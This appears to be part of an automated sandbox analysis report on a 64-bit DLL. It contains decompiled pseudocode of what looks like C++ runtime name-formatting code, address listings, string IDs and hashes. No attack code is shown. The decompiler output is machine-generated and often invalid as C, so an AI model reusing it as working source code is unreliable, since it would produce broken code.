                                                                      				E00000001180006010(0x10, _t699, "`adjustor{", _t837, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                                      				 *(_t1003 + 0x38) = r13d;
                                                                      				_t812 = "}\' ";
                                                                      				 *(_t1003 + 0x30) = _t812;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E00000001180005F1C(_t1003 + 0x70, _t1003 + 0x60, _t1003 + 0x30);
                                                                      				E00000001180006090( !(_t641 >> 4), _t1003 + 0x40, _t812, _t1003 + 0x30);
                                                                      				if ( *0x8007132c != 1) goto 0x80006b92;
                                                                      				_t511 =  *0x80071328; // 0x0
                                                                      				_t512 =  ==  ?  *((void*)(_t1000 - 0x68)) : _t511;
                                                                      				 *0x80071328 =  ==  ?  *((void*)(_t1000 - 0x68)) : _t511;
                                                                      				E000000011800075F0(_t837, _t1003 + 0x60, _t812, _t997, _t1003 + 0x30);
                                                                      				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & 0x00000000;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0x00000000;
                                                                      				_t838 = _t812;
                                                                      				E00000001180007320(0x28, _t812, _t838, _t1003 + 0x50);
                                                                      				_t1020 = _t838;
                                                                      				E00000001180005F48(_t1003 + 0x50, _t1003 + 0x30, _t838);
                                                                      				r8b = 0x29;
                                                                      				_t235 = _t1000 - 0x20; // -29
                                                                      				E00000001180005F74(_t1003 + 0x30, _t235);
                                                                      				E00000001180006090( !(_t641 >> 4), _t1003 + 0x40, _t812, _t838);
                                                                      				if (r12d != 0x800) goto 0x80006c0b;
                                                                      				if ((_t699 & 0x00000700) == 0x200) goto 0x80006c0b;
                                                                      				_t238 = _t1000 - 0x30; // -45
                                                                      				E00000001180006090(_t643, _t1003 + 0x40, _t238, _t838);
                                                                      				_t521 =  *0x80071318; // 0x0
                                                                      				if ((0x00000001 &  !(_t521 >> 0x13)) == 0) goto 0x80006c38;
                                                                      				E0000000118000B3B8(1, _t643, _t699, _t838, _t1003 + 0x60, _t994, _t997);
                                                                      				E00000001180006090(_t643, _t1003 + 0x40, _t812, _t838);
                                                                      				goto 0x80006c5d;
                                                                      				E0000000118000B3B8(1, _t643, _t699, _t838, _t1003 + 0x40, _t994, _t997);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x80006c5d;
                                                                      				if (_t812[1] - 1 <= 0) goto 0x80006c5d;
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                                      				E0000000118000A148(_t1003 + 0x60);
                                                                      				E00000001180006090( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t1003 + 0x40, _t812, _t838);
                                                                      				_t530 =  *0x80071318; // 0x0
                                                                      				if ((0x00000001 &  !(_t530 >> 8)) == 0) goto 0x80006c9c;
                                                                      				E0000000118000CBD8(_t1003 + 0x60);
                                                                      				E00000001180006090( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t1003 + 0x40, _t812, _t838);
                                                                      				goto 0x80006cc1;
                                                                      				E0000000118000CBD8(_t1003 + 0x40);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x80006cc1;
                                                                      				if (_t812[1] - 1 <= 0) goto 0x80006cc1;
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                                      				E00000001180009234(_t812[1] & 0x000000ff, _t1003 + 0x60);
                                                                      				if ( *(_t1003 + 0x48) == r13b) goto 0x80006ceb;
                                                                      				if (_t812[1] - 1 <= 0) goto 0x80006ceb;
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff;
                                                                      				_t539 =  *0x80071318; // 0x0
                                                                      				if ((0x00000001 &  !(_t539 >> 2)) == 0) goto 0x8000670f;
                                                                      				if (_t1043 == 0) goto 0x8000670f;
                                                                      				 *_t1043 =  *(_t1003 + 0x40);
                                                                      				 *(_t1043 + 8) =  *(_t1003 + 0x48);
                                                                      				 *(_t1003 + 0x40) =  *(_t1000 - 0x80);
                                                                      				goto 0x80006f9c;
                                                                      				r13d = 0x6000;
                                                                      				_t909 = _t1003 + 0x40;
                                                                      				E00000001180006090( *(_t1003 + 0x48) & 0xffffff00 | _t812[1] & 0x000000ff, _t909, _t1043, _t838);
                                                                      				r9d = 0x7c00;
                                                                      				if (r14d != 0) goto 0x80006ddc;
                                                                      				_t276 = _t909 - 0x6800; // -26624
                                                                      				if ((_t276 & 0xfffff7ff) != 0) goto 0x80006d71;
                                                                      				E0000000118000D490(0x28, _t699, _t838, _t997, _t1003 + 0x40, _t994, _t997, _t1020, _t1031, _t1032, _t1033);
                                                                      				goto 0x80007267;
                                                                      				if ((_t699 & r9d) != r13d) goto 0x80006ddc;
                                                                      				_t815 = "}\'";
                                                                      				 *(_t1003 + 0x38) = 2;
                                                                      				 *(_t1003 + 0x30) = _t815;
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				r8b = 0x7b;
                                                                      				asm("movdqa [esp+0x50], xmm0");
                                                                      				E00000001180005F74(_t1003 + 0x40, _t1003 + 0x60);
                                                                      				_t839 = _t815;
                                                                      				E000000011800090E8(0, _t839, _t1003 + 0x30, _t994, _t997, _t1031, _t1032, _t1037);
                                                                      				_t286 = _t1000 - 0x20; // 0x5fe0
                                                                      				E00000001180005F48(_t839, _t286, _t1003 + 0x30);
                                                                      				E00000001180005F1C(_t815, _t997, _t1003 + 0x50);
                                                                      				goto 0x80007267;
                                                                      				if ((_t699 & 0x0000fc00) != r9d) goto 0x80006dfa;
                                                                      				E0000000118000D414(_t699 & r9d, 0, _t699, (_t699 & 0x0000fc00) - r9d, _t997, _t1003 + 0x40, _t994, _t997, _t1003 + 0x50, _t1031, _t1032, _t1033);
                                                                      				goto 0x80007267;
                                                                      				r12d = _t699;
                                                                      				r12d = r12d & 0x00001800;
                                                                      				r15d = 0x1200;
                                                                      				_t656 = 0 | r12d == 0x00000800;
                                                                      				 *(_t1000 + 0x70) = _t656;
                                                                      				r13d = 0x1100;
                                                                      				_t623 =  *(_t1000 + 0x68) & 0xffffff00 | (r13d & _t699) == 0x00000000;
                                                                      				_t555 =  !=  ? _t656 : _t623;
                                                                      				_t556 =  ~( !=  ? _t656 : _t623);
                                                                      				asm("sbb edx, edx");
                                                                      				_t693 = 0x1000 & _t699;
                                                                      				if (r14d == 0) goto 0x80006f00;
                                                                      				r8d = _t699;
                                                                      				r8d = r8d & 0x00001b00;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | r8d == 0x00001000) &  ~r14d) == 0) goto 0x80006e99;
                                                                      				 *(_t1003 + 0x38) = 0x20;
                                                                      				 *(_t1003 + 0x30) = "`local static destructor helper\'";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E00000001180006010(_t693, _t699, "`local static destructor helper\'", _t839, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                                      				goto 0x80006f19;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | r8d == r13d) &  ~r14d) == 0) goto 0x80006edc;
                                                                      				 *(_t1003 + 0x38) = 0x30;
                                                                      				 *(_t1003 + 0x30) = "`template static data member constructor helper\'";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E00000001180006010(_t693, _t699, "`template static data member constructor helper\'", _t839, _t1003 + 0x40, _t1003 + 0x30, _t997);
                                                                      				goto 0x80006f47;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | r8d == r15d) &  ~r14d) == 0) goto 0x80006f00;
                                                                      				 *(_t1003 + 0x38) = 0x2f;
                                                                      				goto 0x80006ebb;
                                                                      				if (r14d != 0) goto 0x80006f15;
                                                                      				if ((_t699 & r9d) == 0x7800) goto 0x80007258;
                                                                      				if (_t693 == 0) goto 0x80006f82;
                                                                      				_t695 = _t699 & 0x00001b00;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | _t695 == r13d) &  ~r14d) != 0) goto 0x80006f47;
                                                                      				asm("sbb eax, eax");
                                                                      				if (((0 | _t695 == r15d) &  ~r14d) == 0) goto 0x80006f82;
                                                                      				 *(_t1003 + 0x50) =  *(_t1003 + 0x50) & 0x00000000;
                                                                      				 *(_t1003 + 0x58) =  *(_t1003 + 0x58) & 0x00000000;
                                                                      				E00000001180007320(0x20, "`template static data member destructor helper\'", _t839, _t1003 + 0x50);
                                                                      				E00000001180005F48(_t1003 + 0x50, _t1003 + 0x30, _t1003 + 0x40);
                                                                      				_t819 =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x40) = _t819;
                                                                      				goto 0x80006f9c;
                                                                      				E000000011800097CC(_t699, _t819, _t839, _t1003 + 0x60, _t1003 + 0x40, _t997, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *_t819;
                                                                      				 *(_t1003 + 0x48) =  *(_t819 + 8);
                                                                      				r13d = 0xb;
                                                                      				_t624 =  !=  ?  *(_t1000 + 0x70) : _t623;
                                                                      				 *(_t1000 + 0x68) = _t624;
                                                                      				r15d = _t1035 - 3;
                                                                      				if (_t624 == 0) goto 0x80007196;
                                                                      				_t576 =  *0x80071318; // 0x0
                                                                      				if (( !(_t576 >> 9) & 0x00000001) == 0) goto 0x800070c1;
                                                                      				_t626 = _t699 & 0x00000700;
                                                                      				_t777 = _t626 - 0x200;
                                                                      				_t580 =  !=  ? _t777 == 0 : _t1035 - 0xa;
                                                                      				_t779 =  !=  ? _t777 == 0 : _t1035 - 0xa;
                                                                      				if (( !=  ? _t777 == 0 : _t1035 - 0xa) == 0) goto 0x80007044;
                                                                      				 *(_t1003 + 0x38) = 7;
                                                                      				 *(_t1003 + 0x30) = "static ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E000000011800059CC("static ", _t1003 + 0x60, _t1003 + 0x30);
                                                                      				E00000001180005F48("static ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				if (r14d == 0) goto 0x80007051;
                                                                      				_t781 = _t626 - 0x100;
                                                                      				if (_t781 == 0) goto 0x8000706c;
                                                                      				asm("bt edi, 0xa");
                                                                      				if (_t781 >= 0) goto 0x800070bb;
                                                                      				_t359 = _t839 - 0x400; // 0xe00
                                                                      				if ((_t359 & 0xfffffcff) != 0) goto 0x800070bb;
                                                                      				if (_t626 == 0x700) goto 0x800070bb;
                                                                      				 *(_t1003 + 0x38) = r15d;
                                                                      				 *(_t1003 + 0x30) = "virtual ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E000000011800059CC("virtual ", _t1003 + 0x60, _t1003 + 0x30);
                                                                      				E00000001180005F48("virtual ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				_t588 =  *0x80071318; // 0x0
                                                                      				if (( !(_t588 >> 7) & 0x00000001) == 0) goto 0x80007196;
                                                                      				_t698 = _t699 & 0x000000c0;
                                                                      				_t785 = _t698 - 0x40;
                                                                      				_t671 =  !=  ? _t785 == 0 :  *(_t1000 + 0x70);
                                                                      				_t787 =  !=  ? _t785 == 0 :  *(_t1000 + 0x70);
                                                                      				if (( !=  ? _t785 == 0 :  *(_t1000 + 0x70)) == 0) goto 0x800070ff;
                                                                      				 *(_t1003 + 0x38) = 9;
                                                                      				goto 0x80007153;
                                                                      				_t788 = _t698 - 0x80;
                                                                      				_t789 = r12d - 0x1000;
                                                                      				_t595 =  !=  ? _t788 == 0 : _t789 == 0;
                                                                      				_t791 =  !=  ? _t788 == 0 : _t789 == 0;
                                                                      				if (( !=  ? _t788 == 0 : _t789 == 0) == 0) goto 0x8000712e;
                                                                      				 *(_t1003 + 0x38) = r13d;
                                                                      				goto 0x80007153;
                                                                      				_t792 = _t698;
                                                                      				_t793 = r12d;
                                                                      				_t598 =  !=  ? _t792 == 0 : _t793 == 0;
                                                                      				_t795 =  !=  ? _t792 == 0 : _t793 == 0;
                                                                      				if (( !=  ? _t792 == 0 : _t793 == 0) == 0) goto 0x80007196;
                                                                      				 *(_t1003 + 0x38) = r15d;
                                                                      				 *(_t1003 + 0x30) = "public: ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E000000011800059CC("public: ", _t1003 + 0x60, _t1003 + 0x30);
                                                                      				E00000001180005F48("public: ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				_t601 =  *(_t1003 + 0x38);
                                                                      				 *(_t1003 + 0x48) = _t601;
                                                                      				asm("sbb eax, eax");
                                                                      				if ((_t699 & (_t601 & 0xfffff400) + 0x00001000) == 0) goto 0x80007203;
                                                                      				_t797 =  *0x80071318 & 0x00001000;
                                                                      				if (_t797 != 0) goto 0x80007203;
                                                                      				 *(_t1003 + 0x38) = r15d;
                                                                      				 *(_t1003 + 0x30) = "[thunk]:";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E000000011800059CC("[thunk]:", _t1003 + 0x60, _t1003 + 0x30);
                                                                      				E00000001180005F48("[thunk]:", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				asm("bt edi, 0x10");
                                                                      				if (_t797 >= 0) goto 0x80007258;
                                                                      				 *(_t1003 + 0x38) = r13d;
                                                                      				 *(_t1003 + 0x30) = "extern \"C\" ";
                                                                      				asm("movaps xmm0, [esp+0x30]");
                                                                      				asm("movdqa [esp+0x30], xmm0");
                                                                      				E000000011800059CC("extern \"C\" ", _t1003 + 0x60, _t1003 + 0x30);
                                                                      				E00000001180005F48("extern \"C\" ", _t1003 + 0x30, _t1003 + 0x40);
                                                                      				 *(_t1003 + 0x40) =  *(_t1003 + 0x30);
                                                                      				 *(_t1003 + 0x48) =  *(_t1003 + 0x38);
                                                                      				 *_t997 =  *(_t1003 + 0x40);
                                                                      				_t610 =  *(_t1003 + 0x48);
                                                                      				 *(_t997 + 8) = _t610;
                                                                      				return _t610;
                                                                      			}










































































                                                                      0x1800063e0
                                                                      0x1800063f0
                                                                      0x1800063f5
                                                                      0x1800063fc
                                                                      0x18000640a
                                                                      0x18000640d
                                                                      0x180006413
                                                                      0x180006416
                                                                      0x180006419
                                                                      0x180006422
                                                                      0x18000642a
                                                                      0x180006434
                                                                      0x180006436
                                                                      0x18000643d
                                                                      0x18000643f
                                                                      0x180006448
                                                                      0x18000644a
                                                                      0x18000644d
                                                                      0x180006450
                                                                      0x180006454
                                                                      0x18000645f
                                                                      0x180006461
                                                                      0x18000646c
                                                                      0x18000646f
                                                                      0x180006477
                                                                      0x18000647c
                                                                      0x180006481
                                                                      0x180006486
                                                                      0x18000648c
                                                                      0x18000648e
                                                                      0x180006495
                                                                      0x18000649a
                                                                      0x1800064a2
                                                                      0x1800064a8
                                                                      0x1800064af
                                                                      0x1800064b9
                                                                      0x1800064bc
                                                                      0x1800064d0
                                                                      0x1800064d6
                                                                      0x1800064e3
                                                                      0x1800064e6
                                                                      0x1800064ea
                                                                      0x1800064ed
                                                                      0x1800064f1
                                                                      0x1800064fb
                                                                      0x180006506
                                                                      0x180006508
                                                                      0x18000650e
                                                                      0x180006514
                                                                      0x180006518
                                                                      0x18000651a
                                                                      0x180006535
                                                                      0x180006537
                                                                      0x18000653c
                                                                      0x180006547
                                                                      0x180006551
                                                                      0x180006563
                                                                      0x180006568
                                                                      0x180006571
                                                                      0x180006576
                                                                      0x180006578
                                                                      0x180006581
                                                                      0x180006587
                                                                      0x180006590
                                                                      0x18000659d
                                                                      0x1800065a3
                                                                      0x1800065ae
                                                                      0x1800065ba
                                                                      0x1800065bd
                                                                      0x1800065cf
                                                                      0x1800065dc
                                                                      0x1800065e6
                                                                      0x1800065f6
                                                                      0x1800065f8
                                                                      0x180006605
                                                                      0x18000660f
                                                                      0x180006614
                                                                      0x18000661a
                                                                      0x180006621
                                                                      0x180006626
                                                                      0x18000662c
                                                                      0x180006636
                                                                      0x18000663f
                                                                      0x180006649
                                                                      0x18000664d
                                                                      0x180006651
                                                                      0x18000665e
                                                                      0x180006663
                                                                      0x18000666a
                                                                      0x180006672
                                                                      0x18000667c
                                                                      0x180006686
                                                                      0x18000668c
                                                                      0x180006696
                                                                      0x18000669b
                                                                      0x1800066a9
                                                                      0x1800066b4
                                                                      0x1800066b8
                                                                      0x1800066ba
                                                                      0x1800066c5
                                                                      0x1800066cc
                                                                      0x1800066e0
                                                                      0x1800066e5
                                                                      0x1800066e8
                                                                      0x1800066f1
                                                                      0x1800066fb
                                                                      0x1800066fe
                                                                      0x180006702
                                                                      0x18000670a
                                                                      0x180006712
                                                                      0x180006717
                                                                      0x18000671b
                                                                      0x18000671e
                                                                      0x180006722
                                                                      0x180006725
                                                                      0x180006729
                                                                      0x18000672c
                                                                      0x180006731
                                                                      0x180006735
                                                                      0x180006739
                                                                      0x18000673f
                                                                      0x18000674c
                                                                      0x18000675a
                                                                      0x180006763
                                                                      0x180006772
                                                                      0x18000677c
                                                                      0x18000677f
                                                                      0x180006789
                                                                      0x18000678d
                                                                      0x180006791
                                                                      0x180006794
                                                                      0x18000679b
                                                                      0x1800067a4
                                                                      0x1800067ae
                                                                      0x1800067b6
                                                                      0x1800067bb
                                                                      0x1800067c0
                                                                      0x1800067cc
                                                                      0x1800067d5
                                                                      0x1800067e0
                                                                      0x1800067f2
                                                                      0x1800067f4
                                                                      0x1800067fa
                                                                      0x180006800
                                                                      0x180006805
                                                                      0x180006809
                                                                      0x180006813
                                                                      0x180006815
                                                                      0x18000681e
                                                                      0x180006821
                                                                      0x180006825
                                                                      0x18000682a
                                                                      0x18000682f
                                                                      0x180006834
                                                                      0x18000683c
                                                                      0x18000683e
                                                                      0x180006848
                                                                      0x180006851
                                                                      0x180006855
                                                                      0x18000685e
                                                                      0x180006864
                                                                      0x180006867
                                                                      0x18000686d
                                                                      0x18000687b
                                                                      0x180006884
                                                                      0x18000688e
                                                                      0x180006890
                                                                      0x1800068a2
                                                                      0x1800068a7
                                                                      0x1800068ad
                                                                      0x1800068b2
                                                                      0x1800068b6
                                                                      0x1800068be
                                                                      0x1800068c7
                                                                      0x1800068d3
                                                                      0x1800068d7
                                                                      0x1800068db
                                                                      0x1800068df
                                                                      0x1800068e2
                                                                      0x1800068ef
                                                                      0x1800068f3
                                                                      0x180006902
                                                                      0x180006907
                                                                      0x180006909
                                                                      0x180006918
                                                                      0x18000691e
                                                                      0x18000692c
                                                                      0x180006930
                                                                      0x180006937
                                                                      0x180006939
                                                                      0x180006942
                                                                      0x180006949
                                                                      0x18000694d
                                                                      0x180006953
                                                                      0x18000695b
                                                                      0x18000695f
                                                                      0x180006964
                                                                      0x18000696e
                                                                      0x180006975
                                                                      0x180006978
                                                                      0x18000698a
                                                                      0x180006999
                                                                      0x1800069a8
                                                                      0x1800069b3
                                                                      0x1800069c0
                                                                      0x1800069d2
                                                                      0x1800069d8
                                                                      0x1800069e0
                                                                      0x1800069e7
                                                                      0x1800069f1
                                                                      0x1800069f6
                                                                      0x1800069fa
                                                                      0x180006a00
                                                                      0x180006a05
                                                                      0x180006a11
                                                                      0x180006a16
                                                                      0x180006a23
                                                                      0x180006a28
                                                                      0x180006a33
                                                                      0x180006a38
                                                                      0x180006a3b
                                                                      0x180006a42
                                                                      0x180006a47
                                                                      0x180006a4e
                                                                      0x180006a52
                                                                      0x180006a5f
                                                                      0x180006a70
                                                                      0x180006a7b
                                                                      0x180006a7d
                                                                      0x180006a80
                                                                      0x180006a83
                                                                      0x180006a85
                                                                      0x180006a8b
                                                                      0x180006a8f
                                                                      0x180006a97
                                                                      0x180006a9a
                                                                      0x180006a9e
                                                                      0x180006aa1
                                                                      0x180006aab
                                                                      0x180006aad
                                                                      0x180006abc
                                                                      0x180006ac6
                                                                      0x180006ad0
                                                                      0x180006ad6
                                                                      0x180006adb
                                                                      0x180006ae7
                                                                      0x180006aec
                                                                      0x180006af5
                                                                      0x180006af8
                                                                      0x180006b05
                                                                      0x180006b0a
                                                                      0x180006b0c
                                                                      0x180006b1b
                                                                      0x180006b25
                                                                      0x180006b2f
                                                                      0x180006b35
                                                                      0x180006b3a
                                                                      0x180006b3f
                                                                      0x180006b46
                                                                      0x180006b50
                                                                      0x180006b5f
                                                                      0x180006b65
                                                                      0x180006b72
                                                                      0x180006b7e
                                                                      0x180006b80
                                                                      0x180006b88
                                                                      0x180006b8c
                                                                      0x180006b97
                                                                      0x180006b9c
                                                                      0x180006ba7
                                                                      0x180006bae
                                                                      0x180006bb1
                                                                      0x180006bb6
                                                                      0x180006bc3
                                                                      0x180006bc8
                                                                      0x180006bcb
                                                                      0x180006bd4
                                                                      0x180006be1
                                                                      0x180006bed
                                                                      0x180006bfb
                                                                      0x180006bfd
                                                                      0x180006c06
                                                                      0x180006c0b
                                                                      0x180006c22
                                                                      0x180006c24
                                                                      0x180006c31
                                                                      0x180006c36
                                                                      0x180006c38
                                                                      0x180006c42
                                                                      0x180006c47
                                                                      0x180006c59
                                                                      0x180006c62
                                                                      0x180006c6f
                                                                      0x180006c74
                                                                      0x180006c86
                                                                      0x180006c88
                                                                      0x180006c95
                                                                      0x180006c9a
                                                                      0x180006c9c
                                                                      0x180006ca6
                                                                      0x180006cab
                                                                      0x180006cbd
                                                                      0x180006cc6
                                                                      0x180006cd0
                                                                      0x180006cd5
                                                                      0x180006ce7
                                                                      0x180006ceb
                                                                      0x180006cf8
                                                                      0x180006d01
                                                                      0x180006d0f
                                                                      0x180006d16
                                                                      0x180006d1e
                                                                      0x180006d26
                                                                      0x180006d2b
                                                                      0x180006d34
                                                                      0x180006d39
                                                                      0x180006d3e
                                                                      0x180006d47
                                                                      0x180006d52
                                                                      0x180006d5d
                                                                      0x180006d67
                                                                      0x180006d6c
                                                                      0x180006d74
                                                                      0x180006d76
                                                                      0x180006d7d
                                                                      0x180006d85
                                                                      0x180006d8f
                                                                      0x180006d99
                                                                      0x180006d9c
                                                                      0x180006da2
                                                                      0x180006dae
                                                                      0x180006db1
                                                                      0x180006dbe
                                                                      0x180006dc2
                                                                      0x180006dd2
                                                                      0x180006dd7
                                                                      0x180006de6
                                                                      0x180006df0
                                                                      0x180006df5
                                                                      0x180006dfc
                                                                      0x180006dff
                                                                      0x180006e06
                                                                      0x180006e13
                                                                      0x180006e19
                                                                      0x180006e1c
                                                                      0x180006e22
                                                                      0x180006e2a
                                                                      0x180006e2d
                                                                      0x180006e2f
                                                                      0x180006e3d
                                                                      0x180006e3f
                                                                      0x180006e47
                                                                      0x180006e4a
                                                                      0x180006e60
                                                                      0x180006e64
                                                                      0x180006e66
                                                                      0x180006e75
                                                                      0x180006e7f
                                                                      0x180006e89
                                                                      0x180006e8f
                                                                      0x180006e94
                                                                      0x180006ea6
                                                                      0x180006eaa
                                                                      0x180006eb3
                                                                      0x180006ebb
                                                                      0x180006ec5
                                                                      0x180006ecf
                                                                      0x180006ed5
                                                                      0x180006eda
                                                                      0x180006ee9
                                                                      0x180006eed
                                                                      0x180006ef6
                                                                      0x180006efe
                                                                      0x180006f03
                                                                      0x180006f0f
                                                                      0x180006f17
                                                                      0x180006f1d
                                                                      0x180006f2e
                                                                      0x180006f32
                                                                      0x180006f41
                                                                      0x180006f45
                                                                      0x180006f47
                                                                      0x180006f52
                                                                      0x180006f59
                                                                      0x180006f6d
                                                                      0x180006f72
                                                                      0x180006f77
                                                                      0x180006f80
                                                                      0x180006f8c
                                                                      0x180006f97
                                                                      0x180006f9c
                                                                      0x180006fa6
                                                                      0x180006fac
                                                                      0x180006faf
                                                                      0x180006fb2
                                                                      0x180006fb8
                                                                      0x180006fbe
                                                                      0x180006fcb
                                                                      0x180006fd9
                                                                      0x180006fdf
                                                                      0x180006feb
                                                                      0x180006fee
                                                                      0x180006ff0
                                                                      0x180006ff2
                                                                      0x180007001
                                                                      0x18000700b
                                                                      0x180007015
                                                                      0x18000701b
                                                                      0x18000702d
                                                                      0x180007037
                                                                      0x180007040
                                                                      0x180007047
                                                                      0x180007049
                                                                      0x18000704f
                                                                      0x180007051
                                                                      0x180007055
                                                                      0x180007057
                                                                      0x180007062
                                                                      0x18000706a
                                                                      0x18000706c
                                                                      0x180007078
                                                                      0x180007082
                                                                      0x18000708c
                                                                      0x180007092
                                                                      0x1800070a4
                                                                      0x1800070ae
                                                                      0x1800070b7
                                                                      0x1800070c1
                                                                      0x1800070ce
                                                                      0x1800070d8
                                                                      0x1800070de
                                                                      0x1800070e7
                                                                      0x1800070ea
                                                                      0x1800070ec
                                                                      0x1800070f5
                                                                      0x1800070fd
                                                                      0x180007101
                                                                      0x18000710c
                                                                      0x180007119
                                                                      0x18000711c
                                                                      0x18000711e
                                                                      0x180007127
                                                                      0x18000712c
                                                                      0x180007130
                                                                      0x180007137
                                                                      0x180007140
                                                                      0x180007143
                                                                      0x180007145
                                                                      0x18000714e
                                                                      0x180007153
                                                                      0x18000715d
                                                                      0x180007167
                                                                      0x18000716d
                                                                      0x18000717f
                                                                      0x180007189
                                                                      0x18000718e
                                                                      0x180007192
                                                                      0x180007198
                                                                      0x1800071a6
                                                                      0x1800071a8
                                                                      0x1800071b2
                                                                      0x1800071b4
                                                                      0x1800071c0
                                                                      0x1800071ca
                                                                      0x1800071d4
                                                                      0x1800071da
                                                                      0x1800071ec
                                                                      0x1800071f6
                                                                      0x1800071ff
                                                                      0x180007203
                                                                      0x180007207
                                                                      0x180007209
                                                                      0x180007215
                                                                      0x18000721f
                                                                      0x180007229
                                                                      0x18000722f
                                                                      0x180007241
                                                                      0x18000724b
                                                                      0x180007254
                                                                      0x18000725d
                                                                      0x180007260
                                                                      0x180007264
                                                                      0x180007284

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                      • API String ID: 2943138195-2884338863
                                                                      • Opcode ID: 9996b898fdf9c7f61a8902c657813e9135e409a7b9ea31997c7f31164e737c16
                                                                      • Instruction ID: 38a8b835958b1ac93c59d23635b2bfc8a768ce39e22b1b6e5a496439ceeb169b
                                                                      • Opcode Fuzzy Hash: 9996b898fdf9c7f61a8902c657813e9135e409a7b9ea31997c7f31164e737c16
                                                                      • Instruction Fuzzy Hash: D0928A72614B8986E792CF14E4813EEB7A1F7883D4F509125FA8A47B99DF7CC648CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E0000000118004F2FC(void* __edx, void* __rbx, unsigned int __rcx, void* __rdi, void* __rsi, long long __r9, signed int __r10, void* __r12, void* __r14, void* __r15) {
                                                                      				signed long long _t32;
                                                                      				void* _t43;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      				signed long long _t47;
                                                                      				long long _t54;
                                                                      
                                                                      				_t43 = __rdi;
                                                                      				_t1 = _t46 - 0x6e0; // 0xf86f
                                                                      				_t45 = _t1;
                                                                      				_t47 = _t46 - 0x7e0;
                                                                      				_t32 =  *0x80070098; // 0xd02b0a549a3
                                                                      				 *(_t45 + 0x6d0) = _t32 ^ _t47;
                                                                      				_t54 =  *((intOrPtr*)(_t45 + 0x740));
                                                                      				 *(_t47 + 0x30) = __rcx;
                                                                      				_t5 = _t47 + 0x60; // 0xffaf
                                                                      				 *((long long*)(_t47 + 0x78)) = _t54;
                                                                      				 *((long long*)(_t45 - 0x78)) = __r9;
                                                                      				 *((intOrPtr*)(_t47 + 0x74)) = r8d;
                                                                      				E000000011800554FC(_t5);
                                                                      				r15d = 1;
                                                                      				if (( *(_t47 + 0x60) & 0x0000001f) != 0x1f) goto 0x8004f368;
                                                                      				 *((char*)(_t47 + 0x68)) = 0;
                                                                      				goto 0x8004f377;
                                                                      				_t11 = _t47 + 0x60; // 0xffaf
                                                                      				E00000001180055568(( *(_t47 + 0x60) & 0x0000001f) - 0x1f, _t11);
                                                                      				 *((intOrPtr*)(_t47 + 0x68)) = r15b;
                                                                      				 *((long long*)(__r9 + 8)) = _t54;
                                                                      				_t15 = _t43 + 0xd; // 0x2d
